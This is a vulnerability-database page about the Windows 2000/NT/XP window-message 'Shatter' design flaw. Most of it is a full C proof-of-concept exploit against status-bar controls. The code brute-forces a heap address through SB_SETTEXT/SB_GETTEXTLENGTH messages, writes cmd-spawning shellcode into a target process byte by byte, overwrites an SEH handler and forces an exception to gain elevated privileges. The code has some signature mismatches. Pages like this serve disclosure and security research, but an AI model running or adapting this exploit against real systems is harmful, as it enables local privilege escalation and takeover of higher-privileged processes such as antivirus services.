Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MS Windows 2000/NT 4/XP Window Message Subsystem Design Error Vulnerability (3)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 30 Views

A serious design error in the Win32 API allows elevation of privileges by exploiting window message passing system. Antivirus software running with LocalSystem privileges is vulnerable. Exploits include abuse of WM_TIMER and control statusbar using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS, and SB_GETPARTS messages

Code

                                                source: http://www.securityfocus.com/bid/5408/info
  
A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges.
  
** Microsoft has released a statement regarding this issue. Please see the References section for details.
  
A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner.
  
Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls.
  
Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details.

/*************************************************************************************
* Statusbar Control Shatter exploit 
*
* Demonstrates the use of a combination of windows messages to;
* - brute force a useable heap address
* - place structure information inside a process
* - inject shellcode to known location
* - overwrite 4 bytes of a critical memory address
*
* 4 Variables need to be set for proper execution.
* - tWindow is the title of the programs main window
* - sehHandler is the critical address to overwrite
* - shellcodeaddr is the data space to inject the code
* - heapaddr is the base heap address to start brute forcing
*
* Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues
* Try it out against any program with a progress bar
*
*************************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>

// Local No Null Cmd Shellcode. 
BYTE exploit[] = "\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\x5c\x21\x9d\x77\x03\xd9\xff\xd3\xcc\x90";

char g_classNameBuf[ 256 ];
char tWindow[]="Main Window Title";// The name of the main window

long sehHandler = 0x7cXXXXXX; // Critical Address To Overwrite
long shellcodeaddr = 0x7fXXXXXX; // Known Writeable Space Or Global Space
unsigned long heapaddr = 0x00500000; // Base Heap Address
long mainhWnd;

void doWrite(HWND hWnd, long tByte,long address);
void BruteForceHeap(HWND hWnd);
void IterateWindows(long hWnd);
  
int main(int argc, char *argv[])
{
 
   HMODULE hMod;
   DWORD ProcAddr;
   long x;
	

   printf("%% Playing with status bar messages\n");
   printf("%% [email protected]\n\n");

   if (argc == 2)
	   sscanf(argv[1],"%lx",&heapaddr);	// Oddity

   printf("%% Using base heap address...0x%xh\n",heapaddr);
   printf("+ Finding %s Window...\n",tWindow);
   mainhWnd = (long)FindWindow(NULL,tWindow);

   if(mainhWnd == NULL)
   {
      printf("+ Couldn't Find %s Window\n",tWindow);
      return 0;
   }
   printf("+ Found Main Window At......0x%xh\n",mainhWnd);
   IterateWindows(mainhWnd);
   printf("+ Done...\n");
   
   return 0;
}

void BruteForceHeap(HWND hWnd, long tByte,long address)
{
	long retval;
	BOOL foundHeap = FALSE;
	char buffer[5000];
	memset(buffer,0,sizeof(buffer));

	while (!foundHeap)
	{
		printf("+ Trying Heap Address.......0x%xh ",heapaddr);

		memset(buffer,0x58,sizeof(buffer)-1);

		// Set Window Title
		SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);	
		// Set Part Contents	
		SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
		retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
		printf("%d",retval);
		if(retval == 1)
		{
			// First Retval should be 1
			memset(buffer,0x80,sizeof(buffer)-1);
			// Set Window Title
			SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);	
			// Set Part Contents	
			SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
			retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
			if(retval > 1)
			{
				// Second should be larger than 1
				printf(" : %d - Found Heap Address\n",retval);
				return(0);
			}
		}
		printf("\n");
		heapaddr += 2500;
	}
}


void doWrite(HWND hWnd, long tByte,long address)
{
	char buffer[5000];
	
	memset(buffer,0,sizeof(buffer));
	memset(buffer,tByte,sizeof(buffer)-1);
	// Set Window Title
	SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);	

	// Set Statusbar width
	SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr);
	SendMessage( hWnd,(UINT) SB_GETPARTS,1,address);
		
}

void IterateWindows(long hWnd)
{
   
	long childhWnd,looper;

	childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
	while (childhWnd != NULL)
	{
		IterateWindows(childhWnd);
		childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
	}

	GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
	if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
	{

		// Find Heap Address
		BruteForceHeap((HWND) hWnd);

		// Inject shellcode to known address
		printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
		for (looper=0;looper<sizeof(exploit);looper++)
		 doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
		// Overwrite SEH
		printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);

		doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
		// Cause exception
		printf("+ Forcing Unhandled Exception\n");
		SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
		printf("+ Done...\n");
		exit(0);
	}
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
windows api design errorwindow message passingprivilege elevationantivirus softwarelocalsystem privilegeswm_timer exploitcontrol statusbar exploit
30